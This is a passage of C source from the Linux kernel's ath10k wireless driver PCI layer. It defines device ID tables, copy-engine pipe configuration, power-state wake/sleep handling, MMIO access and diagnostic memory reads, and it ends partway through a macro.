// SPDX-License-Identifier: ISC /* * Copyright (c) 2005-2011 Atheros Communications Inc. * Copyright (c) 2011-2017 Qualcomm Atheros, Inc. */ #include <linux/pci.h> #include <linux/module.h> #include <linux/interrupt.h> #include <linux/spinlock.h> #include <linux/bitops.h> #include "core.h" #include "debug.h" #include "coredump.h" #include "targaddrs.h" #include "bmi.h" #include "hif.h" #include "htc.h" #include "ce.h" #include "pci.h" enum ath10k_pci_reset_mode { ATH10K_PCI_RESET_AUTO = 0, ATH10K_PCI_RESET_WARM_ONLY = 1, }; static unsigned int ath10k_pci_irq_mode = ATH10K_PCI_IRQ_AUTO; static unsigned int ath10k_pci_reset_mode = ATH10K_PCI_RESET_AUTO; module_param_named(irq_mode, ath10k_pci_irq_mode, uint, 0644); MODULE_PARM_DESC(irq_mode, "0: auto, 1: legacy, 2: msi (default: 0)"); module_param_named(reset_mode, ath10k_pci_reset_mode, uint, 0644); MODULE_PARM_DESC(reset_mode, "0: auto, 1: warm only (default: 0)"); /* how long wait to wait for target to initialise, in ms */ #define ATH10K_PCI_TARGET_WAIT 3000 #define ATH10K_PCI_NUM_WARM_RESET_ATTEMPTS 3 /* Maximum number of bytes that can be handled atomically by * diag read and write. */ #define ATH10K_DIAG_TRANSFER_LIMIT 0x5000 #define QCA99X0_PCIE_BAR0_START_REG 0x81030 #define QCA99X0_CPU_MEM_ADDR_REG 0x4d00c #define QCA99X0_CPU_MEM_DATA_REG 0x4d010 static const struct pci_device_id ath10k_pci_id_table[] = { /* PCI-E QCA988X V2 (Ubiquiti branded) */ { PCI_VDEVICE(UBIQUITI, QCA988X_2_0_DEVICE_ID_UBNT) }, { PCI_VDEVICE(ATHEROS, QCA988X_2_0_DEVICE_ID) }, /* PCI-E QCA988X V2 */ { PCI_VDEVICE(ATHEROS, QCA6164_2_1_DEVICE_ID) }, /* PCI-E QCA6164 V2.1 */ { PCI_VDEVICE(ATHEROS, QCA6174_2_1_DEVICE_ID) }, /* PCI-E QCA6174 V2.1 */ { PCI_VDEVICE(ATHEROS, QCA99X0_2_0_DEVICE_ID) }, /* PCI-E QCA99X0 V2 */ { PCI_VDEVICE(ATHEROS, QCA9888_2_0_DEVICE_ID) }, /* PCI-E QCA9888 V2 */ { PCI_VDEVICE(ATHEROS, QCA9984_1_0_DEVICE_ID) }, /* PCI-E QCA9984 V1 */ { PCI_VDEVICE(ATHEROS, QCA9377_1_0_DEVICE_ID) }, /* PCI-E QCA9377 V1 */ { PCI_VDEVICE(ATHEROS, QCA9887_1_0_DEVICE_ID) }, /* PCI-E QCA9887 */ {0} }; static const struct ath10k_pci_supp_chip ath10k_pci_supp_chips[] = { /* QCA988X pre 2.0 chips are not supported because they need some nasty * hacks. ath10k doesn't have them and these devices crash horribly * because of that. */ { QCA988X_2_0_DEVICE_ID_UBNT, QCA988X_HW_2_0_CHIP_ID_REV }, { QCA988X_2_0_DEVICE_ID, QCA988X_HW_2_0_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_2_1_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_2_2_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_3_0_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_3_1_CHIP_ID_REV }, { QCA6164_2_1_DEVICE_ID, QCA6174_HW_3_2_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_2_1_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_2_2_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_3_0_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_3_1_CHIP_ID_REV }, { QCA6174_2_1_DEVICE_ID, QCA6174_HW_3_2_CHIP_ID_REV }, { QCA99X0_2_0_DEVICE_ID, QCA99X0_HW_2_0_CHIP_ID_REV }, { QCA9984_1_0_DEVICE_ID, QCA9984_HW_1_0_CHIP_ID_REV }, { QCA9888_2_0_DEVICE_ID, QCA9888_HW_2_0_CHIP_ID_REV }, { QCA9377_1_0_DEVICE_ID, QCA9377_HW_1_0_CHIP_ID_REV }, { QCA9377_1_0_DEVICE_ID, QCA9377_HW_1_1_CHIP_ID_REV }, { QCA9887_1_0_DEVICE_ID, QCA9887_HW_1_0_CHIP_ID_REV }, }; static void ath10k_pci_buffer_cleanup(struct ath10k *ar); static int ath10k_pci_cold_reset(struct ath10k *ar); static int ath10k_pci_safe_chip_reset(struct ath10k *ar); static int ath10k_pci_init_irq(struct ath10k *ar); static int ath10k_pci_deinit_irq(struct ath10k *ar); static int ath10k_pci_request_irq(struct ath10k *ar); static void ath10k_pci_free_irq(struct ath10k *ar); static int ath10k_pci_bmi_wait(struct ath10k *ar, struct ath10k_ce_pipe *tx_pipe, struct ath10k_ce_pipe *rx_pipe, struct bmi_xfer *xfer); static int ath10k_pci_qca99x0_chip_reset(struct ath10k *ar); static void ath10k_pci_htc_tx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htc_rx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htt_tx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htt_rx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_htt_htc_rx_cb(struct ath10k_ce_pipe *ce_state); static void ath10k_pci_pktlog_rx_cb(struct ath10k_ce_pipe *ce_state); static struct ce_attr host_ce_config_wlan[] = { /* CE0: host->target HTC control and raw streams */ { .flags = CE_ATTR_FLAGS, .src_nentries = 16, .src_sz_max = 256, .dest_nentries = 0, .send_cb = ath10k_pci_htc_tx_cb, }, /* CE1: target->host HTT + HTC control */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 2048, .dest_nentries = 512, .recv_cb = ath10k_pci_htt_htc_rx_cb, }, /* CE2: target->host WMI */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 2048, .dest_nentries = 128, .recv_cb = ath10k_pci_htc_rx_cb, }, /* CE3: host->target WMI */ { .flags = CE_ATTR_FLAGS, .src_nentries = 32, .src_sz_max = 2048, .dest_nentries = 0, .send_cb = ath10k_pci_htc_tx_cb, }, /* CE4: host->target HTT */ { .flags = CE_ATTR_FLAGS | CE_ATTR_DIS_INTR, .src_nentries = CE_HTT_H2T_MSG_SRC_NENTRIES, .src_sz_max = 256, .dest_nentries = 0, .send_cb = ath10k_pci_htt_tx_cb, }, /* CE5: target->host HTT (HIF->HTT) */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 512, .dest_nentries = 512, .recv_cb = ath10k_pci_htt_rx_cb, }, /* CE6: target autonomous hif_memcpy */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, /* CE7: ce_diag, the Diagnostic Window */ { .flags = CE_ATTR_FLAGS | CE_ATTR_POLL, .src_nentries = 2, .src_sz_max = DIAG_TRANSFER_LIMIT, .dest_nentries = 2, }, /* CE8: target->host pktlog */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 2048, .dest_nentries = 128, .recv_cb = ath10k_pci_pktlog_rx_cb, }, /* CE9 target autonomous qcache memcpy */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, /* CE10: target autonomous hif memcpy */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, /* CE11: target autonomous hif memcpy */ { .flags = CE_ATTR_FLAGS, .src_nentries = 0, .src_sz_max = 0, .dest_nentries = 0, }, }; /* Target firmware's Copy Engine configuration. */ static struct ce_pipe_config target_ce_config_wlan[] = { /* CE0: host->target HTC control and raw streams */ { .pipenum = __cpu_to_le32(0), .pipedir = __cpu_to_le32(PIPEDIR_OUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(256), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE1: target->host HTT + HTC control */ { .pipenum = __cpu_to_le32(1), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE2: target->host WMI */ { .pipenum = __cpu_to_le32(2), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(64), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE3: host->target WMI */ { .pipenum = __cpu_to_le32(3), .pipedir = __cpu_to_le32(PIPEDIR_OUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE4: host->target HTT */ { .pipenum = __cpu_to_le32(4), .pipedir = __cpu_to_le32(PIPEDIR_OUT), .nentries = __cpu_to_le32(256), .nbytes_max = __cpu_to_le32(256), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* NB: 50% of src nentries, since tx has 2 frags */ /* CE5: target->host HTT (HIF->HTT) */ { .pipenum = __cpu_to_le32(5), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(512), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE6: Reserved for target autonomous hif_memcpy */ { .pipenum = __cpu_to_le32(6), .pipedir = __cpu_to_le32(PIPEDIR_INOUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(4096), .flags = __cpu_to_le32(CE_ATTR_FLAGS), .reserved = __cpu_to_le32(0), }, /* CE7 used only by Host */ { .pipenum = __cpu_to_le32(7), .pipedir = __cpu_to_le32(PIPEDIR_INOUT), .nentries = __cpu_to_le32(0), .nbytes_max = __cpu_to_le32(0), .flags = __cpu_to_le32(0), .reserved = __cpu_to_le32(0), }, /* CE8 target->host packtlog */ { .pipenum = __cpu_to_le32(8), .pipedir = __cpu_to_le32(PIPEDIR_IN), .nentries = __cpu_to_le32(64), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS | CE_ATTR_DIS_INTR), .reserved = __cpu_to_le32(0), }, /* CE9 target autonomous qcache memcpy */ { .pipenum = __cpu_to_le32(9), .pipedir = __cpu_to_le32(PIPEDIR_INOUT), .nentries = __cpu_to_le32(32), .nbytes_max = __cpu_to_le32(2048), .flags = __cpu_to_le32(CE_ATTR_FLAGS | CE_ATTR_DIS_INTR), .reserved = __cpu_to_le32(0), }, /* It not necessary to send target wlan configuration for CE10 & CE11 * as these CEs are not actively used in target. */ }; /* * Map from service/endpoint to Copy Engine. * This table is derived from the CE_PCI TABLE, above. * It is passed to the Target at startup for use by firmware. */ static struct service_to_pipe target_service_to_ce_map_wlan[] = { { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VO), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VO), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BK), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BK), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BE), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_BE), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VI), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_DATA_VI), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_CONTROL), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(3), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_WMI_CONTROL), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(2), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_RSVD_CTRL), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(0), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_RSVD_CTRL), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(1), }, { /* not used */ __cpu_to_le32(ATH10K_HTC_SVC_ID_TEST_RAW_STREAMS), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(0), }, { /* not used */ __cpu_to_le32(ATH10K_HTC_SVC_ID_TEST_RAW_STREAMS), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(1), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_HTT_DATA_MSG), __cpu_to_le32(PIPEDIR_OUT), /* out = UL = host -> target */ __cpu_to_le32(4), }, { __cpu_to_le32(ATH10K_HTC_SVC_ID_HTT_DATA_MSG), __cpu_to_le32(PIPEDIR_IN), /* in = DL = target -> host */ __cpu_to_le32(5), }, /* (Additions here) */ { /* must be last */ __cpu_to_le32(0), __cpu_to_le32(0), __cpu_to_le32(0), }, }; static bool ath10k_pci_is_awake(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); u32 val = ioread32(ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + RTC_STATE_ADDRESS); return RTC_STATE_V_GET(val) == RTC_STATE_V_ON; } static void __ath10k_pci_wake(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); lockdep_assert_held(&ar_pci->ps_lock); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake reg refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); iowrite32(PCIE_SOC_WAKE_V_MASK, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); } static void __ath10k_pci_sleep(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); lockdep_assert_held(&ar_pci->ps_lock); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep reg refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); iowrite32(PCIE_SOC_WAKE_RESET, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); ar_pci->ps_awake = false; } static int ath10k_pci_wake_wait(struct ath10k *ar) { int tot_delay = 0; int curr_delay = 5; while (tot_delay < PCIE_WAKE_TIMEOUT) { if (ath10k_pci_is_awake(ar)) { if (tot_delay > PCIE_WAKE_LATE_US) ath10k_warn(ar, "device wakeup took %d ms which is unusually long, otherwise it works normally.\n", tot_delay / 1000); return 0; } udelay(curr_delay); tot_delay += curr_delay; if (curr_delay < 50) curr_delay += 5; } return -ETIMEDOUT; } static int ath10k_pci_force_wake(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; int ret = 0; if (ar_pci->pci_ps) return ret; spin_lock_irqsave(&ar_pci->ps_lock, flags); if (!ar_pci->ps_awake) { iowrite32(PCIE_SOC_WAKE_V_MASK, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); ret = ath10k_pci_wake_wait(ar); if (ret == 0) ar_pci->ps_awake = true; } spin_unlock_irqrestore(&ar_pci->ps_lock, flags); return ret; } static void ath10k_pci_force_sleep(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; spin_lock_irqsave(&ar_pci->ps_lock, flags); iowrite32(PCIE_SOC_WAKE_RESET, ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + PCIE_SOC_WAKE_ADDRESS); ar_pci->ps_awake = false; spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static int ath10k_pci_wake(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; int ret = 0; if (ar_pci->pci_ps == 0) return ret; spin_lock_irqsave(&ar_pci->ps_lock, flags); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); /* This function can be called very frequently. To avoid excessive * CPU stalls for MMIO reads use a cache var to hold the device state. */ if (!ar_pci->ps_awake) { __ath10k_pci_wake(ar); ret = ath10k_pci_wake_wait(ar); if (ret == 0) ar_pci->ps_awake = true; } if (ret == 0) { ar_pci->ps_wake_refcount++; WARN_ON(ar_pci->ps_wake_refcount == 0); } spin_unlock_irqrestore(&ar_pci->ps_lock, flags); return ret; } static void ath10k_pci_sleep(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; if (ar_pci->pci_ps == 0) return; spin_lock_irqsave(&ar_pci->ps_lock, flags); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); if (WARN_ON(ar_pci->ps_wake_refcount == 0)) goto skip; ar_pci->ps_wake_refcount--; mod_timer(&ar_pci->ps_timer, jiffies + msecs_to_jiffies(ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC)); skip: spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static void ath10k_pci_ps_timer(struct timer_list *t) { struct ath10k_pci *ar_pci = from_timer(ar_pci, t, ps_timer); struct ath10k *ar = ar_pci->ar; unsigned long flags; spin_lock_irqsave(&ar_pci->ps_lock, flags); ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps timer refcount %lu awake %d\n", ar_pci->ps_wake_refcount, ar_pci->ps_awake); if (ar_pci->ps_wake_refcount > 0) goto skip; __ath10k_pci_sleep(ar); skip: spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static void ath10k_pci_sleep_sync(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); unsigned long flags; if (ar_pci->pci_ps == 0) { ath10k_pci_force_sleep(ar); return; } del_timer_sync(&ar_pci->ps_timer); spin_lock_irqsave(&ar_pci->ps_lock, flags); WARN_ON(ar_pci->ps_wake_refcount > 0); __ath10k_pci_sleep(ar); spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static void ath10k_bus_pci_write32(struct ath10k *ar, u32 offset, u32 value) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; if (unlikely(offset + sizeof(value) > ar_pci->mem_len)) { ath10k_warn(ar, "refusing to write mmio out of bounds at 0x%08x - 0x%08zx (max 0x%08zx)\n", offset, offset + sizeof(value), ar_pci->mem_len); return; } ret = ath10k_pci_wake(ar); if (ret) { ath10k_warn(ar, "failed to wake target for write32 of 0x%08x at 0x%08x: %d\n", value, offset, ret); return; } iowrite32(value, ar_pci->mem + offset); ath10k_pci_sleep(ar); } static u32 ath10k_bus_pci_read32(struct ath10k *ar, u32 offset) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); u32 val; int ret; if (unlikely(offset + sizeof(val) > ar_pci->mem_len)) { ath10k_warn(ar, "refusing to read mmio out of bounds at 0x%08x - 0x%08zx (max 0x%08zx)\n", offset, offset + sizeof(val), ar_pci->mem_len); return 0; } ret = ath10k_pci_wake(ar); if (ret) { ath10k_warn(ar, "failed to wake target for read32 at 0x%08x: %d\n", offset, ret); return 0xffffffff; } val = ioread32(ar_pci->mem + offset); ath10k_pci_sleep(ar); return val; } inline void ath10k_pci_write32(struct ath10k *ar, u32 offset, u32 value) { struct ath10k_ce *ce = ath10k_ce_priv(ar); ce->bus_ops->write32(ar, offset, value); } inline u32 ath10k_pci_read32(struct ath10k *ar, u32 offset) { struct ath10k_ce *ce = ath10k_ce_priv(ar); return ce->bus_ops->read32(ar, offset); } u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr) { return ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + addr); } void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val) { ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + addr, val); } u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr) { return ath10k_pci_read32(ar, PCIE_LOCAL_BASE_ADDRESS + addr); } void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val) { ath10k_pci_write32(ar, PCIE_LOCAL_BASE_ADDRESS + addr, val); } bool ath10k_pci_irq_pending(struct ath10k *ar) { u32 cause; /* Check if the shared legacy irq is for us */ cause = ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_CAUSE_ADDRESS); if (cause & (PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL)) return true; return false; } void ath10k_pci_disable_and_clear_legacy_irq(struct ath10k *ar) { /* IMPORTANT: INTR_CLR register has to be set after * INTR_ENABLE is set to 0, otherwise interrupt can not be * really cleared. */ ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, 0); ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_CLR_ADDRESS, PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL); /* IMPORTANT: this extra read transaction is required to * flush the posted write buffer. */ (void)ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS); } void ath10k_pci_enable_legacy_irq(struct ath10k *ar) { ath10k_pci_write32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS, PCIE_INTR_FIRMWARE_MASK | PCIE_INTR_CE_MASK_ALL); /* IMPORTANT: this extra read transaction is required to * flush the posted write buffer. */ (void)ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + PCIE_INTR_ENABLE_ADDRESS); } static inline const char *ath10k_pci_get_irq_method(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); if (ar_pci->oper_irq_mode == ATH10K_PCI_IRQ_MSI) return "msi"; return "legacy"; } static int __ath10k_pci_rx_post_buf(struct ath10k_pci_pipe *pipe) { struct ath10k *ar = pipe->hif_ce_state; struct ath10k_ce *ce = ath10k_ce_priv(ar); struct ath10k_ce_pipe *ce_pipe = pipe->ce_hdl; struct sk_buff *skb; dma_addr_t paddr; int ret; skb = dev_alloc_skb(pipe->buf_sz); if (!skb) return -ENOMEM; WARN_ONCE((unsigned long)skb->data & 3, "unaligned skb"); paddr = dma_map_single(ar->dev, skb->data, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); if (unlikely(dma_mapping_error(ar->dev, paddr))) { ath10k_warn(ar, "failed to dma map pci rx buf\n"); dev_kfree_skb_any(skb); return -EIO; } ATH10K_SKB_RXCB(skb)->paddr = paddr; spin_lock_bh(&ce->ce_lock); ret = ce_pipe->ops->ce_rx_post_buf(ce_pipe, skb, paddr); spin_unlock_bh(&ce->ce_lock); if (ret) { dma_unmap_single(ar->dev, paddr, skb->len + skb_tailroom(skb), DMA_FROM_DEVICE); dev_kfree_skb_any(skb); return ret; } return 0; } static void ath10k_pci_rx_post_pipe(struct ath10k_pci_pipe *pipe) { struct ath10k *ar = pipe->hif_ce_state; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct ath10k_ce *ce = ath10k_ce_priv(ar); struct ath10k_ce_pipe *ce_pipe = pipe->ce_hdl; int ret, num; if (pipe->buf_sz == 0) return; if (!ce_pipe->dest_ring) return; spin_lock_bh(&ce->ce_lock); num = __ath10k_ce_rx_num_free_bufs(ce_pipe); spin_unlock_bh(&ce->ce_lock); while (num >= 0) { ret = __ath10k_pci_rx_post_buf(pipe); if (ret) { if (ret == -ENOSPC) break; ath10k_warn(ar, "failed to post pci rx buf: %d\n", ret); mod_timer(&ar_pci->rx_post_retry, jiffies + ATH10K_PCI_RX_POST_RETRY_MS); break; } num--; } } void ath10k_pci_rx_post(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int i; for (i = 0; i < CE_COUNT; i++) ath10k_pci_rx_post_pipe(&ar_pci->pipe_info[i]); } void ath10k_pci_rx_replenish_retry(struct timer_list *t) { struct ath10k_pci *ar_pci = from_timer(ar_pci, t, rx_post_retry); struct ath10k *ar = ar_pci->ar; ath10k_pci_rx_post(ar); } static u32 ath10k_pci_qca988x_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { u32 val = 0, region = addr & 0xfffff; val = (ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS) & 0x7ff) << 21; val |= 0x100000 | region; return val; } /* Refactor from ath10k_pci_qca988x_targ_cpu_to_ce_addr. * Support to access target space below 1M for qca6174 and qca9377. * If target space is below 1M, the bit[20] of converted CE addr is 0. * Otherwise bit[20] of converted CE addr is 1. */ static u32 ath10k_pci_qca6174_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { u32 val = 0, region = addr & 0xfffff; val = (ath10k_pci_read32(ar, SOC_CORE_BASE_ADDRESS + CORE_CTRL_ADDRESS) & 0x7ff) << 21; val |= ((addr >= 0x100000) ? 0x100000 : 0) | region; return val; } static u32 ath10k_pci_qca99x0_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { u32 val = 0, region = addr & 0xfffff; val = ath10k_pci_read32(ar, PCIE_BAR_REG_ADDRESS); val |= 0x100000 | region; return val; } static u32 ath10k_pci_targ_cpu_to_ce_addr(struct ath10k *ar, u32 addr) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); if (WARN_ON_ONCE(!ar_pci->targ_cpu_to_ce_addr)) return -ENOTSUPP; return ar_pci->targ_cpu_to_ce_addr(ar, addr); } /* * Diagnostic read/write access is provided for startup/config/debug usage. * Caller must guarantee proper alignment, when applicable, and single user * at any moment. */ static int ath10k_pci_diag_read_mem(struct ath10k *ar, u32 address, void *data, int nbytes) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret = 0; u32 *buf; unsigned int completed_nbytes, alloc_nbytes, remaining_bytes; struct ath10k_ce_pipe *ce_diag; /* Host buffer address in CE space */ u32 ce_data; dma_addr_t ce_data_base = 0; void *data_buf; int i; mutex_lock(&ar_pci->ce_diag_mutex); ce_diag = ar_pci->ce_diag; /* * Allocate a temporary bounce buffer to hold caller's data * to be DMA'ed from Target. This guarantees * 1) 4-byte alignment * 2) Buffer in DMA-able space */ alloc_nbytes = min_t(unsigned int, nbytes, DIAG_TRANSFER_LIMIT); data_buf = dma_alloc_coherent(ar->dev, alloc_nbytes, &ce_data_base, GFP_ATOMIC); if (!data_buf) { ret = -ENOMEM; goto done; } /* The address supplied by the caller is in the * Target CPU virtual address space. * * In order to use this address with the diagnostic CE, * convert it from Target CPU virtual address space * to CE address space */ address = ath10k_pci_targ_cpu_to_ce_addr(ar, address); remaining_bytes = nbytes; ce_data = ce_data_base; while (remaining_bytes) { nbytes = min_t(unsigned int, remaining_bytes, DIAG_TRANSFER_LIMIT); ret = ath10k_ce_rx_post_buf(ce_diag, &ce_data, ce_data); if (ret != 0) goto done; /* Request CE to send from Target(!) address to Host buffer */ ret = ath10k_ce_send(ce_diag, NULL, (u32)address, nbytes, 0, 0); if (ret) goto done; i = 0; while (ath10k_ce_completed_send_next(ce_diag, NULL) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } i = 0; while (ath10k_ce_completed_recv_next(ce_diag, (void **)&buf, &completed_nbytes) != 0) { udelay(DIAG_ACCESS_CE_WAIT_US); i += DIAG_ACCESS_CE_WAIT_US; if (i > DIAG_ACCESS_CE_TIMEOUT_US) { ret = -EBUSY; goto done; } } if (nbytes != completed_nbytes) { ret = -EIO; goto done; } if (*buf != ce_data) { ret = -EIO; goto done; } remaining_bytes -= nbytes; memcpy(data, data_buf, nbytes); address += nbytes; data += nbytes; } done: if (data_buf) dma_free_coherent(ar->dev, alloc_nbytes, data_buf, ce_data_base); mutex_unlock(&ar_pci->ce_diag_mutex); return ret; } static int ath10k_pci_diag_read32(struct ath10k *ar, u32 address, u32 *value) { __le32 val = 0; int ret; ret = ath10k_pci_diag_read_mem(ar, address, &val, sizeof(val)); *value = __le32_to_cpu(val); return ret; } static int __ath10k_pci_diag_read_hi(struct ath10k *ar, void *dest, u32 src, u32 len) { u32 host_addr, addr; int ret; host_addr = host_interest_item_address(src); ret = ath10k_pci_diag_read32(ar, host_addr, &addr); if (ret != 0) { ath10k_warn(ar, "failed to get memcpy hi address for firmware address %d: %d\n", src, ret); return ret; } ret = ath10k_pci_diag_read_mem(ar, addr, dest, len); if (ret != 0) { ath10k_warn(ar, "failed to memcpy firmware memory from %d (%d B): %d\n", addr, len, ret); return ret; } return 0; } #define ath10k_pci_diag_read_hi(ar, dest, src, len) \ 